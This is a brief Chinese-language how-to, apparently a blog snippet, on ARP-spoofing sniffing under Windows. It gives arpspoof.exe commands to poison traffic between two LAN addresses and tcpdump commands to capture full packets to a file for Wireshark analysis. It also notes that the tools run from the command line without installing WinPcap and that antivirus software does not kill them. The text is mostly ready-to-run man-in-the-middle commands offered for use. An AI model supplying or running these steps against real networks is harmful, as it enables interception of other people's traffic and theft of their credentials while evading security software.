windows 下tcpdump+arpspoof arp嗅探
arp 欺骗:
arpspoof.exe /l ##列出网络接口arpspoof.exe 192.168.3.1 192.168.3.5 80 0 1
嗅探:
tcpdump -D //查看网络接口tcpdump -i 3 -w h.cap -s 0
-s0 表示取消抓包长度限制
否则会导致抓包不全!win 下的 tcpdump 好处就是 无需安装wincap 纯命令行下操作
杀软不会干掉
随后便可用 wireshark 分析数据包